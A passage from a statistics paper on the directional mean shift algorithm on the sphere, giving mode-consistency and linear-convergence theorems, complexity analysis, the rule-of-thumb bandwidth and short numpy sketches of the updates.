$$\nabla f_{\text{vMF}}(\bm{x}) = \nu \bm{\mu} C_q(\nu) \cdot \exp\left(\nu \bm{\mu}^T \bm{x} \right) \quad \text{ and } \quad \nabla\nabla f_{\text{vMF}}(\bm{x}) = \nu^2 \bm{\mu} \bm{\mu}^T C_q(\nu) \cdot \exp\left(\nu \bm{\mu}^T \bm{x} \right),$$
which in turn indicates that at the mode $\bm{\mu} \in \Omega_q$,
\begin{align*}
\mathcal{H} f_{\text{vMF}}(\bm{\mu}) &= \left(I_{q+1} -\bm{\mu} \bm{\mu}^T \right) \nabla\nabla f_{\text{vMF}}(\bm{\mu}) \left(I_{q+1} -\bm{\mu} \bm{\mu}^T \right) -\bm{\mu}^T \nabla f_{\text{vMF}}(\bm{\mu}) \left(I_{q+1} -\bm{\mu} \bm{\mu}^T \right)\\
&= -\nu C_q(\nu) \cdot e^{\nu} \left(I_{q+1} -\bm{\mu} \bm{\mu}^T \right).
\end{align*}
By Brauer's theorem (Example 1.2.8 in \citealt{HJ2012}), we conclude that the eigenvalues of $\mathcal{H} f_{\text{vMF}}(\bm{\mu})$ are 0 with (algebraic) multiplicity 1, which is associated with the eigenvector $\bm{\mu}$, and $-\nu C_q(\nu) \cdot e^{\nu}$ with multiplicity $q$, which are associated with the eigenvectors in $T_{\bm{\mu}}$.
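This eigenvalue structure can also be checked numerically. The following Python sketch is our own illustration (not part of the original analysis); the normalizing constant $C_q(\nu)$ is set to $1$, since it only rescales the eigenvalues.

```python
import numpy as np

def vmf_riemannian_hessian(mu, nu, Cq=1.0):
    # Riemannian Hessian of the (extended) vMF density at its mode mu:
    # H f(mu) = P (grad grad f) P - (mu^T grad f) P with P = I - mu mu^T.
    # Cq stands in for the normalizing constant C_q(nu), set to 1 here.
    d = len(mu)
    P = np.eye(d) - np.outer(mu, mu)                     # projection onto T_mu
    grad = nu * Cq * np.exp(nu) * mu                     # Euclidean gradient at mu
    hess = nu**2 * Cq * np.exp(nu) * np.outer(mu, mu)    # Euclidean Hessian at mu
    return P @ hess @ P - (mu @ grad) * P

mu = np.array([0.0, 0.0, 1.0])   # mode on Omega_2
nu = 2.0
eigvals = np.sort(np.linalg.eigvalsh(vmf_riemannian_hessian(mu, nu)))
# eigenvalue 0 along mu; eigenvalue -nu * C_q(nu) * e^nu with multiplicity q = 2
```

As expected, the computed spectrum consists of a single zero eigenvalue in the radial direction and $q$ copies of $-\nu C_q(\nu)\cdot e^{\nu}$ within the tangent space.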
Given these assumptions, the mode consistency of the directional KDE is as follows.
\begin{theorem}
\label{Mode_cons}
Assume (D1), (D2'), (K1), and (M1-2). For any $\delta \in (0,1)$, when $h$ is sufficiently small and $n$ is sufficiently large,
\begin{enumerate}[label=(\alph*)]
\item there must be at least one estimated local mode $\hat{\bm{m}}_k$ within $S_k = \bm{m}_k \oplus \rho_*$ for every $\bm{m}_k \in \mathcal{M}$, and
\item the collection of estimated modes satisfies $\hat{\mathcal{M}}_n \subset \mathcal{M} \oplus \rho_*$ and there is a unique estimated local mode $\hat{\bm{m}}_k$ within $S_k=\bm{m}_k\oplus \rho_*$
\end{enumerate}
with probability at least $1-\delta$. Consequently, when $h$ is sufficiently small and $n$ is sufficiently large, there exist some constants $A_3, B_3 >0$ such that
$$\mathbb{P}\left(\hat{K}_n \neq K \right) \leq B_3 e^{-A_3nh^{q+4}}.$$
\begin{enumerate}[label=(c)]
\item The Hausdorff distance between the collection of local modes and its estimator satisfies $$\mathtt{Haus}\left(\mathcal{M},\hat{\mathcal{M}}_n \right) = O(h^2) + O_P\left(\sqrt{\frac{1}{nh^{q+2}}} \right),$$
as $h\to 0$ and $nh^{q+2} \to \infty$.
\end{enumerate}
\end{theorem}
The proof of Theorem~\ref{Mode_cons} is in Appendix~\ref{Appendix:Thm6_pf}. It states that,
asymptotically, the set of estimated local modes is close to the set of true local modes and that there exists a one-to-one correspondence between pairs of estimated and true local modes.
Thus, the local modes of the directional KDE are good estimators of the local modes of the population directional density.
\begin{remark}
Unlike the statement of Theorem 1 by \cite{Mode_clu2016}, the radius $\rho_*$ in (M2) for $\mathcal{M}$ to contain $\hat{\mathcal{M}}_n$ can be selected to be independent of the dimension of the data. The reason lies in the fact that the proof of statement (a) in Theorem \ref{Mode_cons} performs a third-order Taylor expansion and leverages the constant upper bound for the third-order partial derivatives. The same technique can be used to improve the original proof in Theorem 1 of \cite{Mode_clu2016} to obtain a dimension-free radius for mode consistency.
\end{remark}
\section{Computational Learning Theory of Directional Mean Shift Algorithm}
\label{Sec:Algo_conv}
In this section, we study the algorithmic convergence of Algorithm~\ref{Algo:MS}.
We start with the ascending property and convergence of Algorithm~\ref{Algo:MS}, and then prove the linear convergence of gradient ascent algorithms on the sphere $\Omega_q$. By shrinking the bandwidth parameter, the adaptive step size of Algorithm~\ref{Algo:MS} as a gradient ascent iteration on $\Omega_q$ can be sufficiently small so that the algorithm converges linearly to the estimated local modes around their neighborhoods. Finally, we discuss on the computational complexity of Algorithm~\ref{Algo:MS}.
\subsection{Ascending Property and Convergence of Algorithm \ref{Algo:MS}}
Let $\left\{\hat{\bm{y}}_s\right\}_{s=0}^{\infty}$ be the path of successive points generated by Algorithm~\ref{Algo:MS}.
The corresponding sequence of directional density estimates is given by
$$\hat{f}_h(\hat{\bm{y}}_s) = \frac{c_{h,q}(L)}{n} \sum_{i=1}^n L\left(\frac{1-\hat{\bm{y}}_s^T \bm{X}_i}{h^2} \right) \quad \text{ for } s=0,1,\dots.$$
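For concreteness, with the von Mises kernel $L(r)=e^{-r}$, one iteration of Algorithm~\ref{Algo:MS} renormalizes a kernel-weighted average of the data onto the sphere. The following Python sketch is our own minimal illustration of this update (function names are ours, not a reference implementation):

```python
import numpy as np

def dir_mean_shift_step(y, X, h):
    # One directional mean shift update with the von Mises kernel
    # L(r) = exp(-r): the weights are -L'((1 - y^T X_i)/h^2)
    # = exp(-(1 - y^T X_i)/h^2), and the weighted average of the data
    # is projected back onto the unit sphere.
    w = np.exp(-(1.0 - X @ y) / h**2)
    m = X.T @ w
    return m / np.linalg.norm(m)

def dir_mean_shift(y0, X, h, tol=1e-7, max_iter=1000):
    # Iterate until two successive points are within tol in Euclidean norm.
    y = y0 / np.linalg.norm(y0)
    for _ in range(max_iter):
        y_new = dir_mean_shift_step(y, X, h)
        if np.linalg.norm(y_new - y) < tol:
            return y_new
        y = y_new
    return y
```

Starting from any query point on $\Omega_q$, iterating this update produces the sequence $\{\hat{\bm{y}}_s\}_{s=0}^{\infty}$ analyzed in this section.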
\begin{theorem}[Ascending Property]
\label{MS_asc}
If kernel $L:[0,\infty) \to [0,\infty)$ is monotonically decreasing, differentiable, and convex with $L(0)<\infty$, then the sequence $\left\{\hat{f}_h(\hat{\bm{y}}_s) \right\}_{s=0}^{\infty}$ is monotonically increasing and thus converges.
\end{theorem}
At a high level, the proof of Theorem~\ref{MS_asc} follows from the inequality
\begin{equation}
L(x_2) -L(x_1) \geq L'(x_1) \cdot (x_2-x_1),
\label{MS_ineq}
\end{equation}
which is guaranteed by the convexity and differentiability of the kernel function $L$; see Appendix~\ref{Appendix:Thm8_10_11_pf} for details.
\begin{remark}
\label{Diff_Relax}
Note that the differentiability of kernel $L$ in Theorem \ref{MS_asc} can be relaxed.
The monotonicity and convexity of $L$ already imply that $L$ is differentiable except for a countable set of points
$\mathcal{N}$ (see Sections 6.2 and 6.6 in \citealt{Real_Analysis}). Moreover, the left and right derivatives of $L$ on $\mathcal{N}$ exist and are finite.
Therefore, for any $x_1 \in \mathcal{N}$, we can replace $L'(x_1)$ in \eqref{MS_ineq} by any subgradient $g_{x_1}$ without impacting other parts of the inequality. Furthermore, as the left or right derivatives of the convex function $L$ are non-decreasing, any subgradient $g_{x_1}$ at point $x_1$ satisfies $L'(x_1^-) \leq g_{x_1} \leq L'(x_1^+)$; thus, \eqref{MS_ineq} holds.
\end{remark}
The ascending property of $\left\{\hat{f}_h(\hat{\bm{y}}_s) \right\}_{s=0}^{\infty}$ under the directional mean shift algorithm is not sufficient to guarantee the convergence of its iterative sequence $\{\hat{\bm{y}}_s\}_{s=0}^{\infty}$. To derive the convergence of $\{\hat{\bm{y}}_s\}_{s=0}^{\infty}$, we make the following assumptions on the directional KDE $\hat{f}_h$.
\begin{itemize}
\item {\bf (C1)} The number of local modes of $\hat{f}_h$ on $\Omega_q$ is finite, and the modes are isolated from other critical points.
\item {\bf (C2)} Given the current values of $n$ and $h>0$, we assume that $\hat{\bm{m}}_k^T \nabla \hat{f}_h(\hat{\bm{m}}_k) \neq 0$ for all $\hat{\bm{m}}_k \in \hat{\mathcal{M}}_n$, that is, $\sum\limits_{i=1}^n \hat{\bm{m}}_k^T \bm{X}_i \cdot L'\left(\frac{1-\hat{\bm{m}}_k^T \bm{X}_i}{h^2} \right) \neq 0$.
\end{itemize}
Condition (C1) is a weak condition when the uniform consistency (Theorem~\ref{unif_conv_tang}) and mode consistency (Theorem~\ref{Mode_cons}) are established. In reality, condition (C1) is implied by conditions (D1) and (M1-2) on $f$ as well as (D2') and (K1) on the kernel function $L$ with probability tending to $1$ as the sample size increases and the bandwidth parameter decreases accordingly.
Condition (C2) may look strange at first glance; however, it is a reasonable and common assumption. In practice, it holds for commonly used kernel functions, a reasonable sample size $n$, and a properly tuned bandwidth parameter $h>0$. More importantly, because the directional density $f$ is always positive around its local modes, the following lemma demonstrates that condition (C2) holds with probability tending to 1 as the sample size increases to infinity and the bandwidth parameter tends to 0 accordingly.
\begin{lemma}
\label{Rad_grad}
Assume conditions (D1) and (D2'). For any fixed $\bm{x} \in \Omega_q$, we have
$$h^2 \cdot \mathtt{Rad}\left(\nabla \hat{f}_h(\bm{x}) \right) \asymp h^2 \cdot \nabla\hat{f}_h(\bm{x}) = \bm{x} f(\bm{x}) C_{L,q} + o\left(1 \right) + O_P\left(\sqrt{\frac{1}{nh^q}} \right)$$
as $nh^q \to \infty$ and $h\to 0$, where $C_{L,q}=-\frac{\int_0^{\infty} L'(r) r^{\frac{q}{2}-1} dr}{\int_0^{\infty} L(r) r^{\frac{q}{2}-1} dr} > 0$ is a constant depending only on kernel $L$ and dimension $q$ and ``$\asymp$'' stands for an asymptotic equivalence.
\end{lemma}
The proof of Lemma~\ref{Rad_grad} can be found in Appendix~\ref{Appendix:Thm8_10_11_pf}.
With Lemma~\ref{Rad_grad}, we know that while the tangent component of $\nabla \hat{f}_h$ at each local mode is $0$,
its radial component is diverging; thus, condition (C2) holds asymptotically.
This is not a surprising result, because observations in a directional data sample are supported on the sphere and the directional KDE $\hat{f}_h$ would thus decrease rapidly when moving away from the sphere.
In addition, the limiting behavior of $\nabla \hat{f}_h$ determines the adaptive step size of the directional mean shift algorithm when it approaches the estimated local modes (see Section~\ref{sec:linear} for details). A similar asymptotic behavior of the step size of the mean shift algorithm in the Euclidean setting has been noticed by \cite{MS1995} and restated by \cite{Ery2016}.
We now state the convergence of Algorithm \ref{Algo:MS} under conditions (C1) and (C2).
\begin{theorem}
\label{MS_conv}
Assume (C1) and (C2) and the conditions on kernel $L$ in Theorem \ref{MS_asc}. We further assume that $L$ is continuously differentiable. Then, for each local mode $\hat{\bm{m}}_k \in \hat{\mathcal{M}}_n$, there exists a $\hat{r}_k >0$ such that the sequence $\{\hat{\bm{y}}_s\}_{s=0}^{\infty}$ converges to $\hat{\bm{m}}_k$ whenever the initial point $\hat{\bm{y}}_0 \in \Omega_q$ satisfies $\norm{\hat{\bm{y}}_0 -\hat{\bm{m}}_k}_2 \leq \hat{r}_k$. Moreover, under conditions (D1) and (D2'), there exists a fixed constant $r^* >0$ such that $\mathbb{P}(\hat{r}_k \geq r^*) \to 1$ as $h\to 0$ and $nh^q \to \infty$.
\end{theorem}
The proof of Theorem~\ref{MS_conv} is in Appendix~\ref{Appendix:Thm8_10_11_pf}. The theorem implies that when we initialize the directional mean shift algorithm (Algorithm~\ref{Algo:MS}) sufficiently close to an estimated local mode, it will converge to this mode.
\subsection{Linear Convergence of Gradient Ascent Algorithms on $\Omega_q$} \label{sec:linear}
We now discuss the linear convergence of gradient ascent algorithms on $\Omega_q$.
Because the sphere $\Omega_q$ is not a conventional Euclidean space but a Riemannian manifold,
the definition of a gradient ascent update is more complex. We first provide a brief introduction to some useful concepts from differential geometry.
The interested readers can consult Appendix \ref{sec::GH} for additional details.
An \emph{exponential map} at $\bm x\in \Omega_q$ is a mapping $\mathtt{Exp}_{\bm x}: T_{\bm x} \to \Omega_q$ such that a vector $\bm v\in T_{\bm x}$ is mapped to point $\bm y:=\mathtt{Exp}_{\bm x}(\bm v) \in \Omega_q$ with $\gamma(0) =\bm x, \gamma(1)=\bm y$ and $\gamma'(0)=\bm v$, where $\gamma: [0,1] \to \Omega_q$ is a geodesic.
An intuitive way to think of the exponential map on the sphere $\Omega_q$ is that, starting at point $\bm x$, we identify another point $\bm y$ on $\Omega_q$ along the great circle in the direction of $\bm{v}$ so that the geodesic distance between $\bm x$ and $\bm y$ is $\norm{\bm{v}}_2$.
The inverse of the exponential map is a mapping $\mathtt{Exp}_{\bm x}^{-1}: U\subset \Omega_q \to T_{\bm x}$ such that $\mathtt{Exp}_{\bm x}^{-1}(\bm y)$ represents the vector in $T_{\bm x}$ starting at $\bm x$, pointing to $\bm y$, and with its length equal to the geodesic distance between $\bm x$ and $\bm y$.
$\mathtt{Exp}_{\bm x}^{-1}$ is sometimes called the logarithmic map.
On $\Omega_q$, the notion of \emph{parallel transport} provides a sensible way to transport a vector along a geodesic \citep{Geo_Convex_Op2016}. Intuitively, a tangent vector $\bm v\in T_{\bm x}$ at $\bm x\in \Omega_q$ of a geodesic $\gamma$ is still a tangent vector $\Gamma_{\bm x}^{\bm y}(\bm v) \in T_{\bm y}$ of $\gamma$ after being transported to point $\bm y$ along $\gamma$. Furthermore, parallel transport preserves inner products, that is, $\langle {\bm u},{\bm v} \rangle_{\bm x} =\langle \Gamma_{\bm x}^{\bm y}(\bm u), \Gamma_{\bm x}^{\bm y}(\bm v) \rangle_{\bm y}$.
The above concepts can be defined on a general Riemannian manifold; however, for our purposes, it suffices to focus on the case of $\Omega_q$.
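On $\Omega_q$, both maps admit closed forms: for $\bm v \in T_{\bm x}$ with $\bm{v}\neq \bm{0}$, $\mathtt{Exp}_{\bm x}(\bm v) = \cos\left(\norm{\bm v}_2\right) \bm x + \sin\left(\norm{\bm v}_2\right) \frac{\bm v}{\norm{\bm v}_2}$, while $\mathtt{Exp}_{\bm x}^{-1}(\bm y)$ rescales the tangent component of $\bm y$ at $\bm x$ to length $\arccos(\bm x^T \bm y)$. A minimal numpy sketch (our illustration):

```python
import numpy as np

def sphere_exp(x, v, eps=1e-12):
    # Exponential map on Omega_q: move from x along the tangent vector v
    # by geodesic distance ||v||_2.
    t = np.linalg.norm(v)
    if t < eps:
        return x
    return np.cos(t) * x + np.sin(t) * (v / t)

def sphere_log(x, y, eps=1e-12):
    # Inverse exponential (logarithmic) map: the tangent vector at x
    # pointing to y whose length equals the geodesic distance d(x, y).
    u = y - (x @ y) * x                   # tangent component of y at x
    norm_u = np.linalg.norm(u)
    if norm_u < eps:
        return np.zeros_like(x)
    theta = np.arccos(np.clip(x @ y, -1.0, 1.0))
    return theta * (u / norm_u)
```

By construction, $\mathtt{Exp}_{\bm x}\left(\mathtt{Exp}_{\bm x}^{-1}(\bm y)\right) = \bm y$ whenever $\bm y$ is not antipodal to $\bm x$.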
Adopting the notation of \cite{Geo_Convex_Op2016},
a gradient ascent algorithm applied to an objective function $f$ on $\Omega_q$ (a Riemannian manifold) is written as
\begin{equation}
\label{grad_ascent_Manifold}
\bm{y}_{s+1} = \mathtt{Exp}_{\bm{y}_s}\left(\eta \cdot \mathtt{grad}\, f(\bm{y}_s) \right).
\end{equation}
Recall that given a sequence $\left\{\bm{y}_s \right\}_{s=0}^{\infty}$ converging to $\bm{m}_k \in \mathcal{M}$, the convergence is said to be linear if there exists a positive constant $\Upsilon <1$ (rate of convergence) such that $\norm{\bm{y}_{s+1} -\bm{m}_k} \leq \Upsilon \norm{\bm{y}_s -\bm{m}_k}$ when $s$ is sufficiently large \citep{Boyd2004}. In our context, the norm $\norm{\cdot}$ refers to the geodesic (or great-circle) distance $d(\bm{x},\bm{y})=\norm{\mathtt{Exp}_{\bm x}^{-1}(\bm{y})}_2$ between two points $\bm{x},\bm{y}\in \Omega_q$.
An equivalent statement of linear convergence is that the algorithm takes $O(\log(1/\epsilon))$ iterations to converge to an $\epsilon$-error of $\bm{m}_k$.
Here, we first prove the linear convergence results for the gradient ascent algorithm with $f$ and $\hat f_h$ on $\Omega_q$ under a feasible range of step size $\eta$.
We then demonstrate that the directional mean shift algorithm is an instance of the gradient ascent algorithm on $\Omega_q$ with an adaptive step size, and that its step size eventually falls into the feasible range with a properly tuned bandwidth parameter. Using the notation in \cite{Geo_Convex_Op2016}, we let $\zeta(1, c) \equiv \frac{c}{\tanh(c)}$. One can show by differentiating $\zeta(1, c)$ that $\zeta(1, c)$ is strictly increasing and $\zeta(1, c) > 1$ for any $c>0$.
\begin{theorem}
\label{Linear_Conv_GA}
Assume (D1) and (M1).
\begin{enumerate}[label=(\alph*)]
\item \textbf{Linear convergence of gradient ascent with $f$}: Given a convergence radius $r_0$ with $0< r_0 \leq \sqrt{2-2\cos\left[\frac{3\lambda_*}{2(q+1)^{\frac{3}{2}}C_3} \right]}$, the iterative sequence $\left\{\bm{y}_s\right\}_{s=0}^{\infty}$ defined by the population-level gradient ascent algorithm \eqref{grad_ascent_Manifold} satisfies
$$d(\bm{y}_s, \bm{m}_k) \leq \Upsilon^s \cdot d(\bm{y}_0, \bm{m}_k) \quad \text{ with } \quad \Upsilon = \sqrt{1-\frac{\eta\lambda_*}{2}},$$
whenever $\eta \leq \min\left\{\frac{2}{\lambda_*}, \frac{1}{(q+1)C_3\zeta(1,r_0)} \right\}$ and the initial point $\bm{y}_0 \in \left\{\bm{z}\in \Omega_q: \norm{\bm{z}-\bm{m}_k}_2 \leq r_0 \right\}$ for some $\bm{m}_k \in \mathcal{M}$.
We recall from Section~\ref{Sec:Mode_Const} that $C_3$ is an upper bound for the derivatives of the directional density $f$ up to the third order, $\lambda_*>0$ is defined in (M1), and $\mathcal{M}$ is the set of local modes of the directional density $f$.
\end{enumerate}
We further assume (D2') and (K1) in the sequel.
\begin{enumerate}[label=(b)]
\item \textbf{Linear convergence of gradient ascent with $\hat{f}_h$}: Let the sample-based gradient ascent update on $\Omega_q$ be $\hat{\bm{y}}_{s+1} = \mathtt{Exp}_{\bm{y}_s}\left(\eta\cdot \mathtt{grad}\, \hat{f}_h(\hat{\bm{y}}_s) \right)$. With the same choice of the convergence radius $r_0>0$ and $\Upsilon=\sqrt{1-\frac{\eta\lambda_*}{2}}$ as in (a), if $h\to 0$ and $\frac{nh^{q+2}}{|\log h|} \to \infty$, then for any $\delta \in (0,1)$,
$$d\left(\hat{\bm{y}}_s,\bm{m}_k \right) \leq \Upsilon^s \cdot d\left(\hat{\bm{y}}_0,\bm{m}_k \right) + O(h^2) + O_P\left(\sqrt{\frac{|\log h|}{nh^{q+2}}} \right)$$
with probability at least $1-\delta$, whenever $\eta \leq \min\left\{\frac{2}{\lambda_*}, \frac{1}{(q+1)C_3\cdot\zeta(1,r_0)} \right\}$ and the initial point $\hat{\bm{y}}_0 \in \left\{\bm{z}\in \Omega_q: \norm{\bm{z}-\bm{m}_k}_2 \leq r_0 \right\}$ for some $\bm{m}_k \in \mathcal{M}$.
\end{enumerate}
\end{theorem}
The proof of Theorem~\ref{Linear_Conv_GA} is in Appendix~\ref{Appendix:Thm12_pf}. As shown in (a) of Theorem~\ref{Linear_Conv_GA}, the linear convergence radius of gradient ascent algorithm \eqref{grad_ascent_Manifold} on $\Omega_q$ generally depends on the lower bound $\lambda_*$ on absolute eigenvalues of the Riemannian Hessian $\mathcal{H} f(\bm{x})$ (within the tangent space $T_{\bm{x}}$), the upper bound $C_3$ for the (partial) derivatives of $f$ up to the third order, and manifold dimension $q$.
In practice, we are more interested in the algorithmic convergence rate of sample-based gradient ascent algorithms with directional KDEs to the estimated local modes $\hat{\mathcal{M}}_n$. As indicated by Theorem \ref{unif_conv_tang}, the Hessian matrices of $\hat{f}_h$ at its local modes have only negative eigenvalues within the corresponding tangent spaces given (M1), sufficiently small $h$, and sufficiently large $\frac{nh^{q+4}}{|\log h|}$. In reality, unless the data configuration is highly abnormal, the local modes of directional KDEs are non-degenerate and $\hat{f}_h$ is geodesically strongly concave (see Appendix \ref{sec::GH} for a precise definition) around small neighborhoods of the estimated local modes. When a smooth kernel, say the von Mises kernel, is applied, $\hat{f}_h$ is $\beta$-smooth on $\Omega_q$ and, consequently, a sample-based gradient ascent algorithm with the directional KDE $\hat{f}_h$ converges linearly to the estimated local modes around their small neighborhoods, given a proper step size.
With respect to the directional mean shift algorithm, we recall from the fixed-point equation \eqref{fix_point_grad} that the geodesic distance between $\hat{\bm{y}}_{s+1}$ and $\hat{\bm{y}}_s$ (one-step iteration) is
$$\arccos\left(\frac{\nabla \hat{f}_h(\hat{\bm{y}}_s)^T \hat{\bm{y}}_s}{\norm{\nabla \hat{f}_h(\hat{\bm{y}}_s)}_2} \right).$$
To derive the adaptive step size $\hat{\eta}_s$ of the directional mean shift algorithm as a sample-based gradient ascent iteration $\hat{\bm{y}}_{s+1} = \mathtt{Exp}_{\hat{\bm{y}}_s}\left(\hat{\eta}_s\cdot \mathtt{grad}\, \hat{f}_h(\hat{\bm{y}}_s) \right)$ on $\Omega_q$, we notice the following geodesic distance equation:
$$\norm{\hat{\eta}_s \cdot \mathtt{grad}\, \hat{f}_h(\hat{\bm{y}}_s)}_2 = \arccos\left(\frac{\nabla \hat{f}_h(\hat{\bm{y}}_s)^T \hat{\bm{y}}_s}{\norm{\nabla \hat{f}_h(\hat{\bm{y}}_s)}_2} \right).$$
This shows that the directional mean shift algorithm is a gradient ascent method on $\Omega_q$ with an adaptive step size
$$\hat{\eta}_s = \arccos\left(\frac{\nabla \hat{f}_h(\hat{\bm{y}}_s)^T \hat{\bm{y}}_s}{\norm{\nabla \hat{f}_h(\hat{\bm{y}}_s)}_2} \right) \cdot \frac{1}{\norm{\mathtt{grad}\, \hat{f}_h(\hat{\bm{y}}_s)}_2}$$
for $s=0,1,...$. We denote the angle between the total gradient estimator $\nabla \hat{f}_h(\hat{\bm{y}}_s)$ and $\hat{\bm{y}}_s$ by $\hat{\theta}_s$. By the orthogonality of $\hat{\bm{y}}_s$ and $\mathtt{grad}\, \hat{f}_h(\hat{\bm{y}}_s)\equiv \mathtt{Tang}\left(\nabla \hat{f}_h(\hat{\bm{y}}_s) \right)$, the expression for the adaptive step size $\hat{\eta}_s$ becomes
$$\hat{\eta}_s = \frac{\hat{\theta}_s}{\left(\sin \hat{\theta}_s \right) \cdot \norm{\nabla \hat{f}_h(\hat{\bm{y}}_s)}_2}$$
for $s=0,1,...$. As the directional mean shift algorithm approaches a local mode of $\hat{f}_h$, $\hat{\theta}_s$ tends to 0 and $\frac{\hat{\theta}_s}{\sin \hat{\theta}_s}$ is approximately equal to 1. Thus, the step size $\hat{\eta}_s$ is essentially controlled by the (Euclidean) norm of the total gradient estimator, that is, $\norm{\nabla \hat{f}_h(\hat{\bm{y}}_s)}_2$. The larger the norm of $\nabla \hat{f}_h(\hat{\bm{y}}_s)$ at step $s$, the shorter the step size of Algorithm~\ref{Algo:MS}. Because the tangent component of $\nabla \hat{f}_h(\hat{\bm{y}}_s)$ is small around the estimated local modes, its radial component $\mathtt{Rad} \left(\nabla \hat{f}_h(\hat{\bm{y}}_s) \right)$ dominates the norm $\norm{\nabla \hat{f}_h(\hat{\bm{y}}_s)}_2$.
Lemma~\ref{Rad_grad} suggests that $\norm{\nabla \hat{f}_h(\hat{\bm{y}}_s)}_2$ can be sufficiently large as the sample size increases to infinity and the bandwidth parameter decreases to 0 accordingly; therefore, one can always select a small bandwidth parameter $h$ such that the step size $\hat{\eta}_s$ lies within the feasible range for linear convergence. Algorithm~\ref{Algo:MS} thus converges (at least) linearly around the local modes of the directional KDE $\hat{f}_h$.
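The adaptive step size above can be computed directly from the total gradient estimator. The following sketch is our own illustration (it assumes $\hat{\theta}_s \in (0,\pi)$, so that $\sin\hat{\theta}_s > 0$):

```python
import numpy as np

def adaptive_step_size(y, total_grad):
    # Adaptive step size eta_s = theta / (sin(theta) * ||grad||_2), where
    # theta is the angle between the total gradient estimator and the
    # current point y on the unit sphere; assumes theta in (0, pi).
    g_norm = np.linalg.norm(total_grad)
    cos_theta = np.clip((total_grad @ y) / g_norm, -1.0, 1.0)
    theta = np.arccos(cos_theta)
    return theta / (np.sin(theta) * g_norm)
```

One can check that applying the exponential map at $\hat{\bm{y}}_s$ to $\hat{\eta}_s \cdot \mathtt{Tang}\left(\nabla \hat{f}_h(\hat{\bm{y}}_s) \right)$ indeed reproduces the normalized total gradient, consistent with the fixed-point equation \eqref{fix_point_grad}.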
\subsection{Computational Complexity}
\label{Sec:Com_Complexity}
Given a fixed data set $\{\bm{X}_1,...,\bm{X}_n\} \subset \Omega_q$, the time complexity of Algorithm \ref{Algo:MS} is $O(n\times q)$ for one iteration of the algorithm on a single query point. When Algorithm~\ref{Algo:MS} is applied to the entire data set as the set of query points, each iteration exhibits $O(n^2\times q)$ time complexity. Assuming that the algorithm converges linearly, the total time complexity for reaching an $\epsilon$-error is $O\left(n^2\times q\times \log(1/\epsilon) \right)$. The space complexity of mode clustering with Algorithm~\ref{Algo:MS} is, in general, $O(n\times q)$ if mode clustering is performed on the entire data set to estimate the directional density and only the current set of iteration points is stored in memory. Algorithm \ref{Algo:MS} inevitably faces a computational bottleneck or even inferior performance when the (intrinsic) dimension $q$ is large. This drawback of the algorithm results not only from its time and space complexity, but also from its inherent dependence on nonparametric density estimation, which is known to suffer from \emph{the curse of dimensionality}.
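The $O(n^2\times q)$ per-iteration cost is visible once the update is vectorized over all query points: with the von Mises kernel, each iteration is essentially one weight computation and one matrix product between an $n\times n$ weight matrix and the $n\times (q+1)$ data matrix. A minimal numpy sketch (our illustration, not a reference implementation):

```python
import numpy as np

def dir_mean_shift_all(Y, X, h):
    # One directional mean shift iteration (von Mises kernel) applied to
    # all query points Y at once. When Y is the full data set, W is an
    # n x n weight matrix and W @ X costs O(n^2 x q) per iteration.
    W = np.exp(-(1.0 - Y @ X.T) / h**2)
    M = W @ X
    return M / np.linalg.norm(M, axis=1, keepdims=True)
```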
\section{Experiments}
\label{Sec:Experiments}
In this section, we present our experimental results of the directional mean shift algorithm on both simulated and real-world data sets. Unless stated otherwise, we use the von Mises kernel $L(r)=e^{-r}$ in the directional KDE \eqref{Dir_KDE} to estimate the directional densities and their derivatives. Given the data sample $\{\bm{X}_1,...,\bm{X}_n\}$, the default bandwidth parameter is selected via the rule of thumb in Proposition 2 in \cite{Exact_Risk_bw2013}:
\begin{equation}
\label{bw_ROT}
h_{\text{ROT}} = \left[\frac{4\pi^{\frac{1}{2}} \mathcal{I}_{\frac{q-1}{2}}(\hat{\nu})^2}{\hat{\nu}^{\frac{q+1}{2}}\left[2 q\cdot\mathcal{I}_{\frac{q+1}{2}}(2\hat{\nu}) + (q+2)\hat{\nu} \cdot \mathcal{I}_{\frac{q+3}{2}}(2\hat{\nu}) \right]n} \right]^{\frac{1}{q+4}}
\end{equation}
for $q\geq 1$, which is the optimal bandwidth for the directional KDE that minimizes the asymptotic mean integrated squared error when the underlying density is a von Mises-Fisher density and the von Mises kernel is applied. The estimated concentration parameter $\hat{\nu}$ is given by (4.4) in \cite{spherical_EM} as
$$\hat{\nu} = \frac{\bar{R}(q+1-\bar{R}^2)}{1-\bar{R}^2},$$
where $\bar{R} = \frac{\norm{\sum_{i=1}^n \bm{X}_i}_2}{n}$ (see also \cite{Sra2011} for a detailed discussion and experiments on the numerical approximation of the concentration parameter for von Mises-Fisher distributions). We also perform mode clustering \citep{Mode_clu2016} (sometimes called mean shift clustering in \citealt{MS1975, MS1995}) on the original data sets in our simulation studies, in which data points are assigned to the same cluster if they converge to the same (estimated) local mode. When such a procedure is carried out on the entire data space, it partitions the space into different regions called \emph{basins of attraction} of the (directional) KDE.
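For reference, the rule of thumb \eqref{bw_ROT} together with the concentration estimate $\hat\nu$ can be sketched as follows (our code; \texttt{scipy.special.iv} evaluates the modified Bessel function of the first kind $\mathcal{I}_{\alpha}$):

```python
import numpy as np
from scipy.special import iv   # modified Bessel function of the first kind

def rot_bandwidth(X):
    # Rule-of-thumb bandwidth h_ROT for the directional KDE on Omega_q
    # (q = d - 1), with the concentration parameter nu estimated from the
    # mean resultant length R_bar as in the text.
    n, d = X.shape
    q = d - 1
    R_bar = np.linalg.norm(X.sum(axis=0)) / n
    nu_hat = R_bar * (q + 1 - R_bar**2) / (1 - R_bar**2)
    num = 4 * np.sqrt(np.pi) * iv((q - 1) / 2, nu_hat)**2
    den = nu_hat**((q + 1) / 2) * (
        2 * q * iv((q + 1) / 2, 2 * nu_hat)
        + (q + 2) * nu_hat * iv((q + 3) / 2, 2 * nu_hat)
    ) * n
    return (num / den)**(1 / (q + 4))
```

As expected from \eqref{bw_ROT}, the returned bandwidth shrinks at the rate $n^{-\frac{1}{q+4}}$ as the sample size grows with the concentration held fixed.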
As the true density component from which a data point is generated is known a priori in our simulation studies (i.e., we know the label of each observation), we also provide the misclassification rates or confusion matrices of mode clustering with the directional mean shift algorithm, though one should be aware that mode clustering, by its nature, yields non-overlapping basins of attraction \citep{Morse_Homology2004,chacon2015population}. Figures~\ref{fig:Two_d_ThreeM}, \ref{fig:Mars_data}, and \ref{fig:Earthquake} in this section as well as Figures~\ref{fig:Two_d_OneM} and \ref{fig:Mode_clu_Mars} in Appendix~\ref{Appendix:Ad_Experiments} are plotted via the Matplotlib Basemap Toolkit (\url{https://matplotlib.org/basemap/}).
